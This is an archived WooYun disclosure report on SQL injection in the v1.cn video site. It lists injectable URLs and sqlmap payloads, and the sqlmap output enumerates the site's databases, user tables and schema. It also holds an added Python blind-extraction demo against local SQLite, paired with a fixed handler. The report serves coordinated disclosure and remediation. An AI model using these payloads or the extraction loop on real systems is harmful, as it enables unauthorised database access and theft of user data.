WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader --------http://drop.zone.ci/
2016-01-04: Details sent to the vendor, awaiting vendor handling
2016-01-07: Vendor confirmed; details disclosed to the vendor only
2016-01-17: Details disclosed to core white hats and relevant domain experts
2016-01-27: Details disclosed to regular white hats
2016-02-06: Details disclosed to intern white hats
2016-02-20: Details disclosed to the public
As the title says: there are further injection points. I don't know whether they overlap with an earlier reporter's, so I've submitted all of them.
First injection point
dynamic.app.m.v1.cn/www/dynamic.php?mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302&p=0
The vid parameter is injectable.
sqlmap identified the following injection points with a total of 90 HTTP(s) requests:
---
Place: GET
Parameter: vid
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302; SELECT SLEEP(5)-- &p=0

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302 AND SLEEP(5)&p=0
---
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
Second injection point (pseudo-static URL)
static.app.m.v1.cn/www/mod/mob/ctl/subscription/act/my/uid/8473817*/pcode/010110000/version/4.0.mindex.html
The position marked by the asterisk after uid is injectable (the `*` is sqlmap's custom injection marker, telling it where in the URI path to place payloads).
sqlmap identified the following injection points with a total of 38 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://static.app.m.v1.cn:80/www/mod/mob/ctl/subscription/act/my/uid/8473817 AND 2571=2571/pcode/010110000/version/4.0.mindex.html

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://static.app.m.v1.cn:80/www/mod/mob/ctl/subscription/act/my/uid/8473817 AND SLEEP(5)/pcode/010110000/version/4.0.mindex.html
---
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
Current user and database
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
current user: '[email protected].%'
current database: 'first_video'
current user is DBA: False
Enumerating databases
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
available databases [5]:
[*] first_video
[*] information_schema
[*] test
[*] v1_social
[*] v1_transcode
143 tables
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
select count(*) from information_schema.tables: '143'
I won't list every table here, since this is blind injection; let's go straight to the user tables.
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
select table_name from information_schema.tables where table_name like '%user%' [20]:
[*] USER_PRIVILEGES
[*] group_user
[*] ms_user
[*] ms_user_con
[*] recommend_user_info
[*] recommend_user_info_type
[*] search_delta_user_info
[*] search_total_user_info
[*] sys_user
[*] sys_user_role
[*] user_account
[*] user_account_change_log
[*] user_channel
[*] user_comments
[*] user_focus_on
[*] user_info
[*] user_message
[*] user_opinion
[*] user_phone
[*] user_setup
I had a look at the row counts; it actually seems to be less than the earlier reporter's 400K.
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
Database: first_video
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| user_focus_on            | 456093  |
| search_total_user_info   | 32787   |
| user_info                | 32782   |
| user_message             | 26664   |
| user_account_change_log  | 8569    |
| user_comments            | 5286    |
| user_phone               | 3423    |
| user_channel             | 3070    |
| user_account             | 689     |
| recommend_user_info      | 282     |
| user_setup               | 248     |
| user_opinion             | 88      |
| sys_user_role            | 8       |
| sys_user                 | 6       |
| recommend_user_info_type | 3       |
+--------------------------+---------+
The user_focus_on table doesn't hold much of interest; the relevant data is probably in user_info.
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
Database: first_video
Table: user_info
[19 columns]
+------------------+--------------+
| Column           | Type         |
+------------------+--------------+
| background_img   | varchar(200) |
| COMMENTS         | int(11)      |
| CREATE_TIME      | varchar(40)  |
| DETAIL           | varchar(100) |
| EDITOR           | int(11)      |
| is_certification | tinyint(1)   |
| ISFRIENDS        | int(11)      |
| LASTLOGIN_TIME   | varchar(40)  |
| nickname         | varchar(20)  |
| REGION           | varchar(20)  |
| SEX              | varchar(4)   |
| SHARE            | int(11)      |
| SORTCODE         | int(11)      |
| STATE            | int(11)      |
| USER_ID          | int(11)      |
| USER_IMG         | varchar(200) |
| USER_NAME        | varchar(20)  |
| USER_TYPE        | int(11)      |
| VIDEOS           | int(11)      |
+------------------+--------------+
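Both findings above are blind: sqlmap never sees query output, only whether the page matches the baseline (boolean-based, the "AND 2571=2571" probe) or how long it takes (time-based, SLEEP(5)). The script below is an added illustration, not code from the report or from v1.cn, of what that inference loop does and why the suggested fix stops it. It uses an in-memory SQLite database as a stand-in for the MySQL backend, so the table names (user_comments, user_info), rows and the target subquery are constructed for the demo, and SQLite's unicode()/substr() replace MySQL's ord()/substring(). comments_vulnerable models a handler that concatenates vid into the SQL, as the vid parameter evidently is here; comments_fixed is the hardened form.

```python
import sqlite3


# Constructed stand-in for the MySQL backend: an in-memory SQLite database with a
# toy user_info / user_comments schema. Names and rows are made up for the demo.
def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_info (user_id INTEGER, nickname TEXT)")
    db.execute("CREATE TABLE user_comments (id INTEGER, vid INTEGER, body TEXT)")
    db.executemany("INSERT INTO user_info VALUES (?, ?)",
                   [(1, "admin_v1"), (2, "guest")])
    db.executemany("INSERT INTO user_comments VALUES (?, ?, ?)",
                   [(1, 14084302, "nice"), (2, 14084302, "ok"), (3, 5, "meh")])
    return db


def comments_vulnerable(db, vid):
    """Models the videoComment handler as the report implies it behaves: vid is
    concatenated into the SQL unquoted, so 'vid=14084302 AND 1=1' becomes part of
    the WHERE clause."""
    sql = "SELECT body FROM user_comments WHERE vid = " + vid
    return [row[0] for row in db.execute(sql)]


def comments_fixed(db, vid):
    """Hardened form: reject anything that is not a plain integer, then bind it
    as a parameter instead of splicing it into the statement text."""
    if not vid.isdigit():
        raise ValueError("vid must be a decimal integer")
    sql = "SELECT body FROM user_comments WHERE vid = ?"
    return [row[0] for row in db.execute(sql, (int(vid),))]


def blind_extract(handler, db, base_vid, subquery, max_len=32):
    """Boolean-based blind extraction: a response identical to the baseline means
    the injected condition was true. Each character is recovered by binary search
    over its code point, about 7 requests per character instead of ~95."""
    baseline = handler(db, base_vid)

    def is_true(cond):
        return handler(db, f"{base_vid} AND ({cond})") == baseline

    out = ""
    for i in range(1, max_len + 1):
        if not is_true(f"length(({subquery})) >= {i}"):
            break  # ran past the end of the value
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite's unicode()/substr() stand in for MySQL's ord()/substring()
            if is_true(f"unicode(substr(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def attack_result(handler):
    """Run the extraction against a handler. Returns the leaked string, or None
    when input validation rejected the payload before it reached the database."""
    db = build_db()
    target = "SELECT nickname FROM user_info WHERE user_id = 1"
    try:
        return blind_extract(handler, db, "14084302", target)
    except ValueError:
        return None


if __name__ == "__main__":
    print("vulnerable handler leaks:", attack_result(comments_vulnerable))
    print("fixed handler leaks:     ", attack_result(comments_fixed))
```

Against comments_vulnerable the loop recovers the constructed nickname one character at a time from nothing but "same page / different page" answers, which is exactly why a boolean-based finding with no visible error is still a full data-exfiltration path. Against comments_fixed every probe dies at the integer check; even without that check, the bound parameter would be compared as a number and never parsed as SQL.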
Suggested fix: parameter filtering (validate vid and uid as integers before they reach the query, or use prepared statements).
Severity: High
Vulnerability Rank: 15
Confirmed: 2016-01-07 10:51
Thank you for your attention to 第一视频.
None yet.